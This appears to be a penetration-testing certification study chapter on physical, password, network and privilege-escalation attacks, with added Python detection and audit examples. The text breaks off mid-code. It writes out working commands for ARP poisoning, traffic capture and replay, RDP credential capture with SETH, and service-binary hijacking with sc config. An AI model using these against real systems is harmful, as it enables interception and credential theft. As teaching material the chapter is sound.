Electronic badges are often used to gain access to restricted areas within a building. If attackers can get their hands on a badge, they can use a badge cloning device to copy the electronic data stored on the badge, which can then be used to gain access to the building.

Fence jumping

Having a fence around the perimeter of the facility is only going to keep the innocent people out. A determined hacker can easily climb the fence to gain access to the facility, so it is important that you have designed a fencing strategy that makes it difficult to climb. Most highly secured environments use a high fence that angles out at a 45-degree angle at the top to make it difficult for someone to climb over. Companies also put barbed wire at the top to prevent someone from trying to climb over.

Attacks on locks

Traditional locks are susceptible to lock picking in order to gain access to the locked area. A bump key is one example of a lock-picking technique where a filed-down key is placed in the lock and then tapped (bumped) lightly while turning the key slightly. This causes all of the cylinders within the lock to jump up above the cylinder breaking point (hopefully), which then unlocks the door. Many high-quality locks today advertise that they are “bump proof.”

Lock bypass is another lock-picking technique in which different methods are used to bypass the locking system.
One technique used to bypass a lock is loiding, in which a credit card is used to bypass a self-closing latch system. Car locks can be bypassed by inserting a stiff wire between the door and the car structure in order to manipulate the locking system.

Another example of an attack on locks involves motion-sensor doors that remain locked until they detect that someone is trying to leave from the inside, at which time the door is unlocked. These doors use egress sensors (to detect people going out) that are motion sensors. There is a known hack where hackers spray compressed air from outside through the cracks in the door to trigger the motion sensor to unlock the door.

Common Attack Techniques

System attacks may be performed in a number of different ways in order to gain access to a system. Some common techniques used to attack a system involve password attacks and running exploits against a system, as well as using social engineering techniques, as discussed earlier in this chapter.

Password cracking

Password cracking is a common technique used to gain access to a system, and there are many different types of password attacks.

Dictionary attacks

A dictionary attack occurs when a password-cracking program uses a dictionary or wordlist file that contains all of the words in a language dictionary. This file is then fed into the program, typically with a list of usernames to try. The program then reads the dictionary file, trying each of the words as the password for the user accounts. Dictionary attacks are very fast password attacks because no calculations are needed; the program simply reads the file to get the list of passwords.

Credential brute forcing

Brute-force attacks occur when the password-cracking program calculates every possible password based on the criteria you supply.
You would typically configure the program with the password lengths to try and the character sets to use (for example, 0-9, A-Z, and symbols). The program tries each password one after the other, eventually calculating the correct password given enough time. Brute-force attacks are much slower than dictionary attacks, but given enough time they can be very effective.

Hybrid

A hybrid password attack is the combination of a dictionary attack and calculating passwords. A hybrid password-cracking tool tries each word in the dictionary file and then adds numbers to the end of each word to account for passwords that contain both words and numbers (for example, house2020).

Rainbow tables

Brute-force attacks are very effective, but are extremely slow and can take years to complete. To speed up the process, you can generate or download rainbow tables, which contain all of the passwords from a brute-force attack pre-calculated into a file. The benefit of using a rainbow table is that when you perform the password attack, you can supply the rainbow table that already has all the passwords calculated. You get the effectiveness of a brute force while getting the speed of a dictionary attack (because the password-cracking tool is simply reading a file).

Password spraying

Password spraying is a type of password attack that involves the attacker attempting to log on to many different accounts with the same password. The password is a well-known password, or a default password, that is typically used in that environment. The goal of the password spraying technique is to find an account that may be using a common password.

Hash cracking

Many of the password-cracking tools involve grabbing the password hashes of user accounts and then cracking the password hashes. John the Ripper is an example of a tool that cracks password hashes.

Using exploits

Another common technique to attack a system is to use exploits.
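Before moving on to exploits, a detection-side view of the password attacks above: spraying and brute forcing leave different footprints in failed-logon records (one source, one or two failures each against many accounts, versus many failures against one account). The following Python is an added example, not from the book, that classifies sources over a small constructed log in an invented line format; the time window and thresholds are assumptions to tune per environment.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example (not any real product's format):
#   <ISO-8601 UTC timestamp> auth-failure user=<account> src=<source IP>
LINE_RE = re.compile(r"^(?P<ts>\S+) auth-failure user=(?P<user>\S+) src=(?P<src>\S+)$")


def parse_line(line):
    """Return (timestamp, user, src) for a failed-logon line, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"), m["user"], m["src"]


def classify_sources(lines, window=timedelta(minutes=10), min_accounts=5,
                     max_per_account=2, brute_threshold=10):
    """Label each source IP as 'password-spray', 'brute-force' or 'normal'.

    Spray: inside one window the source fails against at least min_accounts
    distinct accounts while no single account is tried more than
    max_per_account times (one common password tried everywhere, staying
    under the lockout threshold). Brute force: inside one window a single
    account from the source fails brute_threshold times or more.
    """
    by_src = defaultdict(list)
    for ts, user, src in filter(None, map(parse_line, lines)):
        by_src[src].append((ts, user))

    verdicts = {}
    for src, events in by_src.items():
        events.sort()
        verdict = "normal"
        start = 0
        for end in range(len(events)):
            # slide the window start forward so events[start:end+1] spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            per_account = Counter(user for _, user in events[start:end + 1])
            busiest = max(per_account.values())
            if len(per_account) >= min_accounts and busiest <= max_per_account:
                verdict = "password-spray"
                break
            if busiest >= brute_threshold:
                verdict = "brute-force"
                break
        verdicts[src] = verdict
    return verdicts


# Constructed sample log: three sources showing the three behaviours.
BASE_TIME = datetime(2024, 5, 1, 9, 0, 0)


def make_line(offset_s, user, src):
    ts = (BASE_TIME + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"{ts} auth-failure user={user} src={src}"


SAMPLE_LOG = (
    # one attempt against each of six accounts within two minutes, same source
    [make_line(20 * i, u, "203.0.113.7")
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    # twelve attempts against a single account within one minute
    + [make_line(5 * i, "bob", "198.51.100.9") for i in range(12)]
    # a single mistyped password from an ordinary workstation
    + [make_line(300, "carol", "192.0.2.5")]
    # a successful logon line: not a failure, so parse_line ignores it
    + ["2024-05-01T09:06:00Z session-open user=carol src=192.0.2.5"]
)

if __name__ == "__main__":
    for src, verdict in sorted(classify_sources(SAMPLE_LOG).items()):
        print(f"{src:15} {verdict}")
```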
You learn earlier in this chapter that you can use Metasploit, which is a tool that contains a number of exploits that are ready to use. That is not the only way to use exploits; you can create your own or download them from an exploit database site.

Exploit database

Once you know of a vulnerability that exists within a system, you can search an exploit database for the exploit. The Exploit Database (www.exploit-db.com) is one example of a database you can search. Notice in Figure 5-16 that I searched the Exploit Database for MS17-010, which is the exploit reported by Nessus when I did a vulnerability scan of the system.

FIGURE 5-16: Using an exploit database.

When the results appear, click the link for a result to view the details. When looking at the details of the exploit, you can see the following information (see Figure 5-17):

»» The exploit database ID for the exploit

»» The common vulnerabilities and exposures (CVE) ID number for the vulnerability

»» The author of the exploit and the type of exploit (in this case it is a remote exploit)

»» The platform for the exploit

FIGURE 5-17: Looking at exploit details.

There is a download link for the exploit, but you can also scroll down to see the code for the exploit. Metasploit already has the exploits downloaded for you in the one tool, to save you from downloading exploits from a database. Keep in mind that it is always worth checking an exploit database if you do not find an exploit in Metasploit that suits your needs.

Proof-of-concept development (exploit development)

You can also develop your own exploits instead of using exploits provided in Metasploit or in an exploit database. In order to create your own exploits, you must have expert knowledge of the programming language you are using to create the exploit and knowledge of the vulnerability for which you are creating the exploit.
Developing your own exploit is a great way to demonstrate proof of concept that the exploit can happen without focusing on performing malicious activity on the target system.

Cross-compiling code

One of the benefits of using an exploit database to search and download exploits is that you typically are able to download the source code for the exploit. When you download the source code for an exploit, you can compile the code for the platform that works for you. For example, if you want to run the exploit from a Windows system, you can compile the code for Windows.

Exploit modification

Another benefit of getting access to the source code of an exploit is that you can modify the exploit to fit your needs before compiling it.

Exploit chaining

Exploit chaining is the concept that many attacks are a combination of different exploits run one after the other. For example, the attacker could first exploit the web server to then be able to exploit the database server.

Deception

There are many different types of exploits, but you cannot forget the exploit of deception, which is the technique used in social engineering attacks where the attacker tricks users into compromising security. The attacker does this by convincing users to install software that is a trojan, to run a script that creates a user account for the hacker, or to change their passwords.

Exploiting Network-Based Vulnerabilities

Exploits that are created to leverage network-based vulnerabilities are interesting exploits because the attacks are performed across the network — you do not need local access to the systems. This is why you should always be leery of connecting to an untrusted network such as an airport network, hotel network, or the network in an Internet cafe. An attacker can be connected to those networks as well and run a network-based exploit that attacks your system from across the network!
In the following sections we take a look at the common exploits used to take advantage of network-based vulnerabilities.

Common tools used for network-based attacks

So far in this chapter, you have discovered many tools that can be used by penetration testers during attacks, and the objectives of the PenTest+ certification exam specifically reference the following tools for network-based attacks that you should be aware of:

»» Metasploit: As you learn earlier in this chapter, Metasploit is a framework that contains a number of exploits against different products.

»» Netcat: Netcat is a common tool used to open a port on a system to allow you to connect back to that system at a later time. Netcat can also be used to establish the connection to the open port. You learn how to use Netcat in Chapter 9.

»» Nmap: Nmap is a popular tool to discover systems that are running services you wish to exploit. You learn about Nmap in Chapter 3.

Common network-based exploits

Network-based vulnerabilities exist in many common networking services and protocols we use every day. Following are some common exploits used by pentesters and attackers:

»» Name-resolution exploits: Name-resolution exploits are exploits against technologies that resolve names to IP addresses, such as the NetBIOS name service that converts computer names to IP addresses, and the Link-Local Multicast Name Resolution (LLMNR) protocol that converts hostnames to an IPv4 or IPv6 address. Common name-resolution ports are UDP port 137 (NetBIOS name service), UDP port 138 (NetBIOS datagram service), and TCP port 139 (NetBIOS session service).

»» Link-Local Multicast Name Resolution (LLMNR)/NetBIOS Name Service (NBT-NS) poisoning: This exploit is a form of name-resolution attack where the victim broadcasts a message to the network looking for the IP address of a system that has a particular file share.
An attacker intercepts this request and then sends the attacker’s server information so that the victim tries to connect to the attacker’s system. During this process the attacker collects the credentials that were passed during the connection attempt. Responder is an example of a tool you can use to perform this type of attack.

»» New Technology LAN Manager (NTLM) relay attacks: This exploit is an older attack type on the NTLM protocol where attackers inject themselves between a client and a server and are able to capture the password hashes. Once the password hashes are obtained, attackers can then try their favorite password crackers on the hashes.

»» SMB exploits: Server Message Block (SMB) is the file-sharing protocol for Microsoft networks. In order to exploit a system with an SMB exploit, the system must be running SMB and be vulnerable to the exploit (not patched). The EternalBlue exploit used earlier in this chapter is an SMB exploit. SMB uses TCP port 139 (NetBIOS) and TCP port 445.

»» SNMP exploits: The Simple Network Management Protocol (SNMP) is a protocol used to monitor and manage network devices. A system running SNMP may be vulnerable to SNMP exploits. SNMP uses UDP port 161.

»» SMTP exploits: The Simple Mail Transfer Protocol (SMTP) is the Internet protocol for sending email. A system running an SMTP service, such as a web server or email server, may be vulnerable to an SMTP exploit. SMTP uses TCP port 25.

»» FTP exploits: The File Transfer Protocol (FTP) is a service that allows the uploading and downloading of files from a machine running an FTP service. If the system is not patched, it may be vulnerable to an FTP exploit. FTP uses TCP ports 20 and 21.

Note that if you are not running these services, you do not have to worry about being attacked via these exploits. If you are running these services, you should ensure that you patch the systems on a regular basis so that any known vulnerabilities are fixed.
As a penetration tester, there are a wealth of exploits against these services, so using a port scan to discover systems running these services is critical. To locate systems running the services using TCP ports, you can use Nmap as follows:

    nmap -sS 192.168.2.0/24 -p 139,445,25,21

To locate the systems that run the services using UDP ports, run the following Nmap command:

    nmap -sU 192.168.2.0/24 -p 137,138,161

Man-in-the-middle (MiTM) attacks

Man-in-the-middle (MiTM) attacks, now referred to as on-path attacks, are common attacks used by hackers to insert themselves into the communication path of their victim so that they can capture a copy of all communication sent from the victim’s system. MiTM attacks are common attacks on wireless networks such as an Internet cafe network, and also for password attacks to try to capture passwords used on the network.

ARP poisoning

One type of MiTM attack is known as ARP poisoning. With ARP poisoning, the attacker poisons the client’s ARP cache with the IP address of the default gateway (the router) and associates that IP address with the attacker’s MAC address. The reason for this is that the victim’s system will now send all Internet traffic to the attacker’s system because the victim thinks the attacker is the router to get out to the Internet. In this example, the hacker will enable routing on the hacker’s system so that the system will send the victim’s traffic out to the Internet — ensuring the victim does not suspect a thing!

Using Kali Linux, you can perform ARP poisoning by entering the following command:

    arpspoof -i eth0 192.168.2.1

This command sends out ARP reply messages on the network that interface eth0 is connected to and gives the attacker’s MAC address for the IP address 192.168.2.1 (the default gateway) to all systems on that network to store in their ARP cache.
You will also want to ensure that your penetration testing system has routing enabled using this command:

    echo 1 > /proc/sys/net/ipv4/ip_forward

For the PenTest+ certification exam, remember that with ARP poisoning, also known as ARP spoofing, the attacker will typically spoof the address of the default gateway or router.

Capture, replay, and relay

Now that you have poisoned the ARP cache of the systems on the network, causing them to send all Internet traffic to your penetration testing system, you can use a tool such as Wireshark or tcpdump to capture all the traffic to a capture file.

Capturing network traffic means to record the network traffic to a file either for later analysis or to be replayed. For example, if you want to capture all web traffic to a file using tcpdump, run the tcpdump command with a port filter:

    tcpdump -w webtraffic.pcap port 80

To replay traffic is to submit it back on the network after it has been captured in order to generate more network traffic. To replay traffic on the network from a packet capture file, run the tcpreplay command:

    tcpreplay -i eth0 webtraffic.pcap

You can also use tcpreplay to manipulate what data is played from the capture file and the speed at which it is replayed.

You can also relay the traffic received, which is to forward any traffic that your system receives on to another system. For example, as I mention earlier, you could forward all traffic your penetration testing system receives from the clients on the network to the default gateway address (the router). In this example, you simply need to enable routing on the penetration testing system to relay all traffic to the default gateway. This allows you to perform a MiTM attack and to receive all traffic, but still route it out to the Internet so that the network clients do not notice you are in the middle of the communication.

SSL stripping and downgrade

Two additional concepts related to MiTM attacks are SSL stripping and downgrade attacks.
SSL stripping occurs when the attacker is performing a MiTM attack while the user is surfing a secure website (HTTPS), and the attacker is able to remove the encryption from the communication. The attacker accomplishes this by establishing a secure connection (HTTPS) with the site the victim is visiting, but continues to use HTTP to communicate with the victim. Because the attacker is the one visiting the encrypted site, the attacker has the keys to decrypt the communication, while having unsecure communication with the victim (see Figure 5-18).

A downgrade attack occurs when the hacker forces the victim to use a lower-version protocol that is considered unsecure and easily exploited. For example, instead of using WPA2 wireless security, the attacker forces the user to use the previous version, WPA, whose encryption key is easier to crack.

FIGURE 5-18: SSL stripping to bypass HTTPS.

Using SETH to perform a MiTM attack

You can use SETH, a script written by Adrian Vollmer of SySS Research, to perform a MiTM attack and place your system between the Remote Desktop Protocol (RDP) server and an RDP client to capture logon credentials. The following steps demonstrate how to use SETH:

1. On your Kali system, run ifconfig in a terminal session and record the IP address: _____________________.

2. Note the IP addresses of the RDP client and RDP server:

   RDP client: _______________________________
   RDP server: ______________________________

3. Launch a terminal session in Kali Linux.

4. Run the following commands to download SETH and then change to the downloaded folder:

    git clone https://github.com/SySS-Research/Seth.git
    cd Seth

5. Run the following command to execute SETH (see Figure 5-19):

    ./seth.sh eth0

Keep in mind that if the RDP server exists on a different subnet, you would use the IP address of the router as the last parameter — not the IP address of the RDP server.
Kali Linux is injected into the middle of the communication by performing ARP spoofing. When the client computer makes a connection to the RDP server, you will see the credentials appear in the terminal on Kali.

FIGURE 5-19: Using SETH to capture RDP credentials.

Other common attacks

A number of other types of attacks can be performed on systems in order to gain access to those systems. Following are some common types of attacks to be familiar with for the PenTest+ certification exam.

DNS cache poisoning

A common attack on systems is to attack a system’s DNS name resolution so that you can direct victims to whatever system you want when they access common DNS names. For example, if I want to capture a person’s Facebook logon information, I could alter the victim’s hosts file on the hard drive of the victim after compromising the system with another exploit. I can modify the hosts file so that the fully qualified domain name (FQDN) www.facebook.com points to a fake website I set up that looks like the Facebook site. The victim would then try to log on with their Facebook username and password, and I would store that information in a database while giving the user a logon error that states, “Facebook is having problems right now. Please try again.”

Pass the hash

Pass the hash is the idea that after you exploit a system, you can grab the hash values of the victim’s Windows passwords and then use that hash value to authenticate to other servers on the network by supplying it as the password to those systems. An example of using the pass the hash technique is provided in Chapter 8.

DoS/stress testing

Another common attack type is a denial of service attack, or DoS attack. A DoS attack is designed to overwhelm a system, causing it to no longer respond to valid requests from clients on the network or even to crash the system.
When performing a penetration test, it is critical to verify whether DoS attacks are permitted. Typically they are not allowed because they cause service disruption.

When performing a penetration test on applications, you can perform a stress test where you send a large workload to the application to see how it responds. Performing a stress test during a penetration test is helpful to see how the application would hold up to an attack in which the attacker tries to overload the system and essentially perform a DoS attack. As with DoS attacks, verify that stress testing is authorized during the penetration test before performing one.

NAC bypass

As a security measure, companies invest in network access control (NAC) technologies in order to determine whether a device is allowed to connect to the network. A NAC bypass attack is used by the attacker to bypass the NAC features that control who can gain access to the network. An attacker can typically bypass the NAC by spoofing the MAC address of their system to that of an authorized device such as a printer or VoIP phone.

VLAN hopping

Companies today separate systems into different networks known as VLANs. For example, the accounting department may be on VLAN1, while the rest of the company is on VLAN2. With VLANs, the systems on one VLAN are typically inaccessible to the systems on the other VLAN. There are different methods used to exploit VLANs and gain access to traffic on another VLAN. Two methods are switch spoofing and double tagging. Switch spoofing occurs when the attacker impersonates a switch by running the VLAN tagging protocol and the VLAN trunking protocol, which are designed to manage the VLAN system. Double tagging is a technique used by the attacker to tag a frame for multiple VLANs, allowing the frame to be transmitted to VLANs it typically would not be allowed to reach.
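To make the double-tagging case concrete, here is an added Python example, not from the book, that parses the 802.1Q tag stack of an Ethernet frame and flags frames carrying more than one tag. The frames are constructed: the outer tag is VLAN 1 and the inner tag is VLAN 2, mirroring the VLAN1/VLAN2 example above, and the MAC addresses are made up.

```python
import struct

# TPIDs that announce a VLAN tag: 802.1Q, 802.1ad service tag, legacy QinQ.
VLAN_TPIDS = {0x8100, 0x88A8, 0x9100}


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(dst, src, vids, ethertype, payload):
    """Build an Ethernet frame carrying zero or more 802.1Q tags (used to construct samples)."""
    hdr = bytes.fromhex(dst.replace(":", "")) + bytes.fromhex(src.replace(":", ""))
    for vid in vids:
        hdr += struct.pack("!HH", 0x8100, vid & 0x0FFF)  # PCP 0, DEI 0, 12-bit VID
    return hdr + struct.pack("!H", ethertype) + payload


def parse_frame(frame):
    """Walk the header, collecting every VLAN ID until a non-VLAN EtherType is reached."""
    if len(frame) < 14:
        raise ValueError("frame shorter than a minimal Ethernet header")
    dst, src = mac_str(frame[0:6]), mac_str(frame[6:12])
    offset, vids = 12, []
    while True:
        if offset + 2 > len(frame):
            raise ValueError("truncated frame: EtherType missing")
        (ethertype,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        if ethertype not in VLAN_TPIDS:
            break
        if offset + 2 > len(frame):
            raise ValueError("truncated frame: VLAN TCI missing")
        (tci,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        vids.append(tci & 0x0FFF)
    return {"dst": dst, "src": src, "vlans": vids,
            "ethertype": ethertype, "payload": frame[offset:]}


def is_double_tagged(frame):
    return len(parse_frame(frame)["vlans"]) >= 2


def flag_double_tagged(frames):
    """Return (index, source MAC, VLAN list) for every frame that carries more than one tag."""
    hits = []
    for i, frame in enumerate(frames):
        parsed = parse_frame(frame)
        if len(parsed["vlans"]) >= 2:
            hits.append((i, parsed["src"], parsed["vlans"]))
    return hits


# Constructed samples. Hosts on an access port send untagged or single-tagged
# frames; a double-tagged frame (outer VID 1 = native VLAN, inner VID 2) is the
# shape used in a double-tagging hop from VLAN1 to VLAN2.
UNTAGGED = build_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", [], 0x0806, bytes(28))
SINGLE_TAGGED = build_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", [1], 0x0806, bytes(28))
DOUBLE_TAGGED = build_frame("00:aa:bb:cc:dd:ee", "00:11:22:33:44:55", [1, 2], 0x0800,
                            b"\x45" + bytes(19))

if __name__ == "__main__":
    for hit in flag_double_tagged([UNTAGGED, SINGLE_TAGGED, DOUBLE_TAGGED]):
        print("double-tagged frame", hit)
```

A tag stack deeper than one arriving from a host port is what such a check should alert on; the usual switch-side countermeasure is to keep the trunk's native VLAN on an ID no access port uses.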
MAC spoofing

MAC spoofing occurs when attackers or penetration testers alter the MAC address of their system or the source MAC address in a frame. The purpose of altering the MAC address is so that attackers or pentesters can hide their identities or bypass any security controls that block systems by MAC address. For example, with wireless networking, if the access point only allows connections from systems listed in the MAC filtering feature, attackers could spoof their MAC addresses so that they appear as one of those systems.

Exploiting Local-Host Vulnerabilities

Now that you understand some of the network vulnerabilities and methods used to exploit the network environment, let’s take a look at some common vulnerabilities and exploits that affect the local systems themselves.

In this section, we look at some of the operating systems, services, and protocols that may be vulnerable to exploits. We then look at some of the common vulnerabilities and exploits for Windows and Linux systems.

Operating system vulnerabilities

Systems today are running a variety of different operating systems, and each operating system has its own list of vulnerabilities. As a penetration tester, you can use a vulnerability scanner to identify the vulnerabilities of each of these systems:

»» Microsoft Windows: Windows 10 is the current desktop operating system in the Windows line. Windows systems should be kept up-to-date with security patches to ensure that known vulnerabilities are patched. Windows systems are a huge target due to their popularity on corporate networks and at home.

»» macOS: Over the years there have been a number of vulnerabilities with macOS, including the Dock vulnerability (which allowed physical access to the host), the Mail vulnerability (which allowed the attacker access to messages intended for others), and the LaunchServices vulnerability (causing a DoS). Those are just a few examples of vulnerabilities on macOS.
»» Linux: Although Linux systems have a great reputation in the security field, some versions of Linux may be vulnerable to DoS attacks or arbitrary code execution due to vulnerabilities in some kernel versions.

»» Android: Android is a common operating system on different types of devices such as smartphones and TV boxes. Android systems have a number of client-side vulnerabilities, vulnerabilities if the attacker has physical access, and vulnerabilities that can be leveraged without administrator rights.

»» iOS: iOS is the operating system for iPhones. Reported vulnerabilities with iOS include memory corruption issues that cause problems with confidentiality, integrity, and availability.

Unsecure service and protocol configurations

Attackers most often gain access to host systems due to vulnerabilities in either a service or daemon that is running on that system, or a protocol configuration setting on the host system that creates the weakness in the system. You can use Nmap to discover running services on a host system and use Nessus to discover known vulnerabilities on that system. Once you know of a few vulnerabilities, you can then search Metasploit for an exploit for that vulnerability.

The service or protocol may have vulnerabilities, or the vulnerability may be due to the way the service is configured. For example, the web sites for WWW services could be configured to use default folders with default permissions. It is recommended that you always alter any default configuration settings if possible, to create a more secure system.

Privilege escalation

Privilege escalation occurs when the attacker exploits a vulnerability in the system to gain elevated permissions to the system, applications, or the data. This elevated permission is typically that of administrative capabilities that allow the attacker to manipulate the system any way the attacker wants.
Linux-specific

Following are some common techniques you can use to gain elevated privileges on Linux systems:

»» SUID/SGID programs: Many programs, such as ping, require root-level access when a user executes the program. These programs execute with root-level privileges because the SUID (set user ID) bit is set on the program and the owner is set to root. If attackers can exploit a program that runs as root, they can elevate their privileges to root level. SGID is similar in concept, but it is used to specify that the program is to execute with the group permissions assigned to the program.

»» Unsecure SUDO: sudo is a program in Linux that allows a user to run a program as another user. It originally was used to run programs as root (also known as the superuser), but it now allows users to specify the account to run as. Allowing programs to run via sudo can lead to privilege escalation if the attacker can figure out how to shell out of the command while it is running and then execute any shell commands the attacker wants.

»» Ret2libc: CPUs use a no-execute bit to flag areas of memory that are for storage and not for executing code. The ret2libc attack overwrites the return address of a subroutine so that it refers to a subroutine that is already in an executable area of memory used by the program, such as a libc function. This can allow the attacker to bypass the no-execute memory feature.

»» Sticky bit: The sticky bit is a Linux feature that ensures only the owner or root user can rename or delete a file. If the sticky bit is not set, any user with execute and write permissions can rename or delete the file.
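The SUID/SGID and sticky-bit items above are things an administrator can audit directly from file modes. The Python below is an added example, not from the book: it walks a directory tree reporting SUID and SGID executables and world-writable directories that lack the sticky bit, and builds a throwaway sample tree (a constructed stand-in for a real file system, so that it runs without root) to audit.

```python
import os
import stat
import tempfile


def audit_tree(root):
    """Return sorted (finding, path relative to root) tuples for:
    suid / sgid               regular files with the set-user-ID or set-group-ID bit
    world-writable-no-sticky  directories anyone can write to without the sticky bit,
                              so any user can rename or delete other users' files there
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)                      # lstat: never follow symlinks
            if (stat.S_ISDIR(st.st_mode) and (st.st_mode & stat.S_IWOTH)
                    and not (st.st_mode & stat.S_ISVTX)):
                findings.append(("world-writable-no-sticky", os.path.relpath(full, root)))
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue                             # skip symlinks, sockets, devices
            rel = os.path.relpath(full, root)
            if st.st_mode & stat.S_ISUID:
                findings.append(("suid", rel))
            if st.st_mode & stat.S_ISGID:
                findings.append(("sgid", rel))
    return sorted(findings)


def make_sample_tree():
    """Create a throwaway directory tree (a constructed stand-in for a real file system)."""
    root = tempfile.mkdtemp(prefix="privesc-audit-")
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    for name, mode in (("ping_like", 0o4755),   # SUID, like ping on older systems
                       ("sgid_tool", 0o2755),   # SGID
                       ("normal", 0o755)):      # plain executable, must not be reported
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    os.mkdir(os.path.join(root, "shared"))
    os.chmod(os.path.join(root, "shared"), 0o777)     # anyone may delete anyone's files
    os.mkdir(os.path.join(root, "tmp_like"))
    os.chmod(os.path.join(root, "tmp_like"), 0o1777)  # sticky bit set, as on /tmp
    return root


if __name__ == "__main__":
    sample = make_sample_tree()
    for finding, path in audit_tree(sample):
        print(f"{finding:26} {path}")
```

Run audit_tree("/") as root on a real host to get the full list; every SUID entry it returns is a program whose owner's privileges any local user can reach, so each one should be known and patched.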
Windows-specific

To gain elevated privileges on Windows systems, a number of techniques can be used, such as the following:

»» Cpassword: If administrators of Windows systems are using some of the features of Group Policy Preferences, it is possible that credential information is stored in an XML file on Sysvol that contains the encrypted passwords in a property called cpassword. After obtaining the encrypted cpassword setting from the XML file, attackers can use the PowerSploit Get-GPPPassword function to crack the password.

»» Clear text credentials in LDAP: Lightweight Directory Access Protocol (LDAP) is the directory access protocol used to query directory services such as Active Directory. Like protocols such as HTTP or FTP, LDAP does not encrypt communication, so it is possible for an attacker to gain access to credentials that are sent in clear text across the network.

»» Kerberoasting: Kerberoasting is the process of stealing credentials used by service accounts on a network that uses Kerberos authentication. The attacker does this by scanning Active Directory for accounts with service principal names (SPNs) associated with them, then sending requests for service tickets using those SPNs. Using Mimikatz, the attacker can then extract the service tickets and save them to a file, because they contain password hashes. The hacker can then crack the passwords offline.

»» Credentials in LSASS: The Local Security Authority Subsystem Service (LSASS) is responsible for security services in Windows such as logging users onto the system. Using LSASS, it is possible to dump the password hashes to a file to be cracked.

»» Unattended installation: Using unattended installations, especially with older versions of Windows, could create vulnerabilities if default installation settings are used.
»» SAM database: Vulnerabilities within Windows could give access to the SAM database, which contains the usernames and hashed passwords for the Windows system.

»» DLL hijacking: A Dynamic Link Library (DLL) is a file that contains functions to be called by other applications. DLLs are a common way to share code between applications and are very common in Windows. DLL hijacking occurs when an attacker tricks your application into loading a malicious DLL instead of one of the common DLLs on the system. Once the malicious DLL is loaded by the application, the malicious code can execute and cause harm to the system.

Exploitable services

Any unpatched service running on a system could let an attacker into the system once the attacker exploits the unpatched or vulnerable service. Following are two common issues to watch for:

»» Unquoted service paths: An attacker can gain system-level privileges by taking advantage of unquoted service paths, a vulnerability found when a service references an executable path that contains spaces without using quotes. If quotes are not used, it is possible for the attacker to manipulate the path to reference a different executable.

»» Writable services: When investigating services running on a system, you may discover writable services where you can modify the configuration of the service to execute the program code of your choice with the sc config command (note that sc requires a space after each option's equals sign):

sc config MyService binpath= "d:\MyService.exe"
sc config MyService obj= "Admin" password= "pass"
net stop MyService
net start MyService

Unsecure file/folder permissions

Systems with non-secure file and folder permissions configured can be vulnerable to a number of different types of attacks. Attackers may be able to gain access to sensitive data or modify information on the system.
This is true of systems that have been installed with default installation options, as the default configuration of the system often has unsecure file and folder permissions set.

Keylogger

A compromised system could be vulnerable to a keylogger running on the system. A keylogger records the keystrokes of the user and either stores them in a file for the hacker to retrieve later or sends them to the hacker. The recorded keystrokes could reveal sensitive information such as the usernames and passwords of accounts being used by the victim.

Scheduled tasks

Scheduled tasks are programs that are scheduled to run at regular intervals, at a specific time, when the system starts up, or when the user logs on. If the program that is scheduled to run is vulnerable to attack, it could let the attacker into the system when it runs.

Kernel exploits

The kernel is the core code of the operating system. When this code runs, it has system-level privileges, which is full access to the system. If an attacker exploits vulnerabilities found in kernel-mode code, the attacker could have full control of the system. Be sure to apply security patches to the system to protect against these types of attacks.

Default account settings

Software that creates default accounts as part of the installation process may expose the system or application to security risks. Some examples of account settings that present security risks are default user account names, default passwords, and non-expiring password settings. A simple way to attempt to gain access to a device or system is to research default account settings such as usernames and passwords.

Sandbox escape

Sandbox environments run software in a contained environment that is designed to prevent the software from accessing anything outside the sandbox. For example, you could run software in a contained environment by running it in a virtual machine (VM).
Sandbox escape refers to malicious code run in a sandbox being able to access resources outside the sandbox. Following are some examples of sandbox escape exploits:

»» Shell upgrade: A restricted shell is a shell environment with limited permissions. A shell environment vulnerable to sandbox escaping techniques could give an attacker elevated permissions.

»» VM: A sandbox escape exploit in a virtual machine environment could result in the attacker gaining access to resources outside the VM and on the host system.

»» Container: Containers are minimal virtual-machine-like environments, and as with VMs, if sandbox escape exploits are performed, the attacker could gain access to resources outside the container, specifically the host operating system.

Physical device security

Software is not the only item at risk of exploitation. Hardware devices can also have vulnerabilities exploited by the attacker to gain access to the device. Following are examples of such exploits:

»» Cold boot attack: If an attacker can get physical access to a system, the attacker can perform a cold boot attack, which involves performing a hard reset of the system in order to dump memory and grab sensitive information such as encryption keys.

»» JTAG debug: The Joint Test Action Group (JTAG) interface allows you to communicate with computer chips on a board. It is typically used by manufacturers to test connections between pins on a computer chip. An attacker with physical access to the system could connect to the JTAG interface and use a debugger such as OpenOCD to send commands to the device.

»» Serial console: Many devices such as routers and switches have a console port on the back of the device that is used to administer the device. If an attacker can gain access to your server room with the routers and switches, the attacker could get console access to the device and modify its configuration.
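Two of the Windows exposures described earlier in this section, unquoted service paths (under Exploitable services) and stored cpassword values in Group Policy Preferences XML (under Windows-specific), can be checked from configuration data alone. The following is an added Python example, not the book's code and not the code of any tool it names: it flags service ImagePath values whose executable portion contains spaces without quotes and produces the quoted form, and it parses a Groups.xml file for non-empty cpassword attributes. The service table and the Groups.xml content are constructed samples (the ciphertext is a placeholder), and the function names are this example's own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of what "sc qc" reports for each service's BINARY_PATH_NAME:
# {service name: ImagePath}. Not taken from a real host.
SAMPLE_SERVICES = {
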